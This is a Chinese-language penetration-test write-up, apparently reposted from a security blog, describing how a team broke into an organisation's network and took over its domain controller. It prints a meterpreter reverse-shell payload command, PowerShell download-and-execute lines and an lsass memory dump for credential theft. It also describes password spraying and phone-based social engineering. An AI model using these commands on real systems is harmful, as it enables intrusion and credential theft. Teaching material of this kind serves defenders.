记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

特工小分队再出发

2020-09-01 22:48

这是 酒仙桥六号部队 的第 72 篇文章。

全文共计1953个字,预计阅读时长7分钟


经酒仙桥六号部队任务发放,接到新的任务需要执行。


一、背景

随着互联网的快速发展,特别是移动互联网的崛起,网络安全形势更为严峻。网络安全不仅涉及公民信息安全,更涉及国家安全。树立正确的网络安全观,全面加强网络安全建设,是整个互联网行业乃至社会发展到一定阶段的必然要求。

经授权对某区域内的咖啡厅、饭店、KTV等场所排查发现,有一家饭店疑似存在嫌疑人员,该饭店老板是外籍华人,在此地驻扎开店已有2-3年的时间,疑似证据主要来自该饭店的WIFI无线网络向外通讯并发送相关照片等资料。通过嗅探、抓包等技术手段,以及饭店内外无一人的情况,还是依然有数据通讯的场景下,经过信息收集后进行渗透测试排查。


二、信息收集

目标信息:

某境外组织,知道其域名和IP范围,进行渗透测试。

从OSINT(公开资源情报计划,是美国CIA的一种情报收集手段,从各种公开的信息资源中寻找和获取有价值的情报)可以发现的大量信息,我们也可以使用工具来帮助我们找到子域名、登陆点(Citrix,OWA(outlook的网页端),VPN,SharePoint等)、建站CMS、电子邮件地址等。

(例如谷歌,Shodan, Censys (censys.io),connect.data.com,Fierce,Recon-ng,SimplyEmail, TheHarvester, SpiderFoot (spiderfoot.net), hunter.io, VirusTotal (virustotal.com), FOCA, Maltegoand Pastebin (pastebin.com)等)

大量的信息收集后,收集到的有用信息是:outlook的登录页面(扫描其C段找到),Citrix应用程序以及1000多用户名。

搜集到的用户名:

Citrix登录页面:

outlook登陆页面(OWA)


三、入侵

知道了其owa我们用MailSniper工具进行Password Spray 攻击。

(MailSniper下载地址:https://github.com/dafthack/mailsniper

MailSniper简介:

MailSniper有两个主要函数。这两个函数是Invoke-GlobalMailSearch和Invoke-SelfSearch

首先用powershell打开;

搜索域中的所有邮箱命令:

Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname Exch01 -OutputCsv global-email-search.csv

搜索当前用户的邮箱命令:

Invoke-SelfSearch -Mailbox current-user@domain.com

其他规则:

爆破失败。通过查找其子域名发现某子网站有找回用户名的功能,并且通过查看其发布的文章准备通过找回账户的方式进行账号找回。

成功知道用户名后,尝试爆破密码,失败,攻击进入瓶颈。在浏览页面的时候突然看到竟然可以拨打电话进行询问密码,于是通过之前的信息收集,准备询问。

怀着忐忑的心情拨打了电话,本以为会遇到各种问题,没想到当说出用户名时就告诉了你密码!!

虽然只是普通用户,但是发现了其密码规则,于是进行重新组合密码进行爆破。

运气不错,成功登录。

成功登录。

通过查找发现“文件”菜单中的“另存为”选项,导航到C:\ Windows \ System32 \目录,并调出Windows CMD实用程序(cmd.exe)。

打开CMD,使我可以访问后端Citrix服务器。


四、域渗透

powershell加载shellcode介绍

UNIX系统一直有着功能强大的壳程序(shell),Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序(例如:sh、bash或csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

powershell具有在硬盘中易绕过,内存中难查杀的特点。一般在后渗透中,攻击者可以在计算机上执行代码时,会下载powershell脚本来执行,ps1脚本文件无需写入到硬盘中,直接可以在内存中执行。

常见的powershell攻击工具有powersploit、nishang、empire、powercat,都提供了非常牛掰的攻击脚本,也正因为powershell的强大,现在被杀软盯的都非常紧了。

我这里使用的是Invoke-Shellcode加载,Invoke-Shellcode是PowerSploit里的一个脚本工具,通过它可以加载自定义的shellcode,而且还支持在powershell中反弹msf,支持http和https协议。

先用msfvenom生成脚本木马:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=监听IP LPORT=3333 -f powershell -o shell.ps1

在msf中监听:

windows/x64/meterpreter/reverse_https

在powershell中分别执行下面命令。

IEX(New-Object Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution/Invoke-Shellcode.ps1")      IEX(New-Object Net.WebClient).DownloadString("下载地址/shell.ps1")      Invoke-Shellcode -Shellcode ($buf) -Force

Msf上线:

顺便说一下cs流量加密,本地复现成功。

首先使用kali自带的keytool工具创建证书文件,命令:

keytool -genkey -alias tryblog -keyalg RSA -validity 18899 -keystore tryblog.store

然后修改c2.profile配置文件。

验证证书./teamserver IP 密码 ./c2.profile。

成功上线。

接下来我借助内置工具setspn.exe快速定位当前域内所有存活的各类服务器。

命令:

setspn.exe -T DomainName -Q /

接下来准备获取域用户的账号和密码(最好是域管理员),我这里采用的是lsass进程内存获取hash(当然还有很多其他的方法比如使用mimikatz、lazagne、incognito等工具或者是通过注册表获取、通过task list查看是否有与用户开启的进程如果有则凭证窃取等)。

首先下载procdump(下载地址:https://technet.microsoft.com/en-us/sysinternals/dd996900),然后执行命令(当前是管理员权限):

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

然后使用mimikatz或者hashcat进行解密。

成功得到域管理员的密码并且成功登录域控。


五、总结

   

针对此次渗透过程的简单梳理:

们在信息化建设中还需要在任何关键节点上部署流量检测审计waf,对流量做到感知,知晓,明确,跟踪等一系列全方位的把控。从防守者角度来说我们需要做到攻击者进不来,进来了找不到,找到了拿不到,拿到了带不走,带走了看不懂原则。在硬件和软件层面层层设防,最终在任何一个环节都可以形成安全闭环。



知识来源: https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247486751&idx=1&sn=fe6dfcbdd4fd2a600b10186d93cf465d

阅读:20446 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“特工小分队再出发”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云